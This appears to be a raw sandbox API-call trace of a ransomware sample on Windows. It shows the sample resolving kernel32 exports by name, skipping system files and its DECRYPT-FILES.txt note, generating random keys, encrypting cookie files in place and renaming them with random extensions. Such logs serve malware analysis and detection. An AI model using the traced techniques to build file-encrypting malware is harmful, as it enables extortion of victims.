[0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.021] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.021] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.022] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.022] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.022] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.022] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.022] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.022] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.022] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.022] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.022] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.022] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.022] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.022] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.022] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.022] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.022] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.022] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.022] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.022] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.023] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.023] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC") returned 116 [0181.023] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC.S3ei6") returned 122 [0181.023] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.qahc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC.S3ei6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.qahc.s3ei6"), dwFlags=0x0) returned 1 [0181.023] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.024] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.024] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.024] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86af2d0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x2c7870d0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xab3f77e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J", cAlternateFileName="5P5NRG~1.ERE")) returned 1 [0181.024] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J", lpString2="DECRYPT-FILES.txt") returned -1 [0181.024] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J", lpString2="autorun.inf") returned -1 [0181.024] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J", lpString2="boot.ini") returned -1 [0181.024] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J", lpString2="desktop.ini") returned -1 [0181.024] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J", lpString2="ntuser.dat") returned -1 [0181.024] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J", lpString2="iconcache.db") returned -1 [0181.024] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J", lpString2="bootsect.bak") returned -1 [0181.024] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J", lpString2="ntuser.dat.log") returned -1 [0181.024] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J", lpString2="thumbs.db") returned -1 [0181.024] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J", lpString2="Bootfont.bin") returned -1 [0181.024] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J") returned 40 [0181.024] lstrcmpiW (lpString1="ERE4J", lpString2="lnk") returned -1 [0181.024] lstrcmpiW (lpString1="ERE4J", lpString2="exe") returned -1 [0181.024] lstrcmpiW (lpString1="ERE4J", lpString2="sys") returned -1 [0181.024] lstrcmpiW (lpString1="ERE4J", lpString2="dll") returned 1 [0181.024] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0181.024] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J") returned 40 [0181.025] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0181.025] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J" [0181.025] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ere4j"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0181.025] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=540) returned 1 [0181.025] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0181.025] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.025] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.025] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.026] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.026] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0181.026] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.026] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.027] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.027] CloseHandle (hObject=0x280) returned 1 [0181.027] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.027] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0181.028] CloseHandle (hObject=0x0) returned 0 [0181.028] CloseHandle (hObject=0x27c) returned 1 [0181.028] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.028] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.028] GetTickCount () returned 0x1134b15 [0181.029] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.029] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.029] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.029] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.029] lstrlenA (lpString="kernel32.dll") returned 12 [0181.029] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.029] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.029] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.029] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.029] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.029] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.029] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.030] lstrlenA (lpString="ADDATOMA") returned 8 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.030] lstrlenA (lpString="ADDATOMW") returned 8 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.030] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.030] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.030] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.030] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.030] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.030] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.030] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.030] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.030] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.030] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.030] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.030] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.030] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.030] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.030] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.030] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.030] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.030] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.031] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.031] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.031] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.031] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.031] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.031] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.031] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.031] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.031] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.031] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.031] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.031] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.031] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.031] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.031] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.031] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.031] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.031] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.031] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.032] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.032] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.032] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.032] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.032] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.032] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.032] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.032] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.032] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.032] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.032] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.032] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.032] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.032] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.032] lstrlenA (lpString="BEEP") returned 4 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.032] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.032] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.033] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.033] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.033] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.033] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.033] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.033] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.033] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" 